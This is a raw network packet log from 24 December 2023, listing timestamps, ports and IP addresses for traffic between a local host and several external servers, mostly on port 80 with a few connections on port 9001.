Dec 24, 2023 10:44:29.003113031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.003149033 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.003174067 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.003220081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.003233910 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.003273010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.003371954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.003413916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.003457069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.003499031 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.003671885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.003714085 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.003772974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.003812075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.003887892 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.003931999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.003957033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.003995895 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.004051924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.004092932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.004107952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.004147053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.004162073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.004201889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.004215956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.004257917 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.004271984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.004314899 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.004596949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.004611015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.004646063 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.004667044 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.004715919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.004765034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.004771948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.004805088 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.004820108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.004889965 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.004904032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.004947901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.004961967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.005392075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.279289961 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.337647915 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.631783962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.631783962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.743906021 CET	49720	9001	192.168.2.5	103.253.41.98
Dec 24, 2023 10:44:29.744596958 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:29.941672087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.941719055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.944947958 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.944979906 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.005827904 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:30.006704092 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:30.006966114 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:30.218833923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.236577034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.236661911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.236725092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.236742020 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.236833096 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.236895084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.236948967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.237092972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.237198114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.237247944 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.237319946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.237366915 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.237425089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.237520933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.237571955 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.237606049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.237715006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.237795115 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.237843990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.237945080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.238027096 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.238074064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.238130093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.238225937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.238271952 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.238323927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.238365889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.238442898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.238527060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.238575935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.238648891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.238712072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.238809109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.238862991 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.238914967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.238953114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.238998890 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.239080906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.239124060 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.239166975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.239298105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.239350080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.239381075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.239444017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.239496946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.239522934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.239594936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.239686012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.239736080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.239803076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.239896059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.239942074 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.239989996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.240037918 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.240108013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.240200043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.240255117 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.240288019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.240386009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.240433931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.240463972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.240547895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.240602970 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.240649939 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.240660906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.240731001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.240780115 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.240802050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.240881920 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.240901947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.241003990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.241046906 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.241058111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.241143942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.241192102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.241225004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.241283894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.241359949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.241364002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.241451025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.241508007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.241559029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.241619110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.241740942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.241789103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.241856098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.241959095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.242007017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.242058039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.242079020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.242105961 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.242175102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.242244005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.242289066 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.242315054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.242362976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.242415905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.242468119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.242515087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.242547989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.242624998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.242671013 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.242702961 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.242793083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.242840052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.242906094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.242985964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.243096113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.243108034 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.243176937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.243230104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.243273973 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.243307114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.243474960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.243519068 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.243571043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.243622065 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.243678093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.243741035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.243853092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.243896961 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.243927956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.243989944 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.244029999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.244051933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.244096994 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.244126081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.244189978 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.244239092 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.244271040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.244338989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.244381905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.244410992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.244482040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.244571924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.244617939 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.244684935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.244780064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.244827032 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.244862080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.244904995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.244955063 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.245054007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.245100975 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.245152950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.245189905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.245232105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.245265961 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.245336056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.245438099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.245480061 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.245548010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.245642900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.245676041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.245793104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.245908976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.245954037 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.245986938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.246089935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.246134996 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.246239901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.246282101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.246498108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.246515036 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.246531010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.246558905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.246568918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.246675968 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.246728897 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.246781111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.246885061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.246931076 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.247008085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.247056007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.247085094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.247164965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.247224092 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.247277975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.247361898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.247474909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.247519970 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.247551918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.247656107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.247701883 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.247754097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.247791052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.247798920 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.247870922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.247920990 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.247937918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.248166084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.248188019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.248213053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.248265982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.248346090 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.248397112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.248481035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.248528957 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.248562098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.248627901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.248673916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.248702049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.248744965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.248795986 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.248830080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.248929977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.249001980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.249047995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.249049902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.249109030 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.249145985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.249186039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.249232054 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.249288082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.249403954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.249455929 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.249504089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.249584913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.249656916 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.249702930 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.249727964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.249778032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.249823093 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.249852896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.249895096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.249922037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.250000954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.250052929 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.250062943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.250147104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.250247955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.250294924 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.250355959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.250439882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.250488997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.250538111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.250597954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.250644922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.250669956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.250722885 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.250732899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.250806093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.250849009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.250915051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.251002073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.251049995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.251075029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.251137018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.251224041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.251270056 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.251339912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.251411915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.251451969 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.251497030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.251545906 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.251605988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.251688957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.251751900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.251795053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.251820087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.251864910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.251916885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.252007961 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.252053976 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.252105951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.252192974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.252238989 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.252295017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.252410889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.252480984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.252526999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.252576113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.252631903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.252684116 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.252716064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.252764940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.252767086 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.252834082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.252875090 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.252907991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.253047943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.253094912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.253145933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.253232002 CET	80	49716	91.215.85.17	192.168.2.5
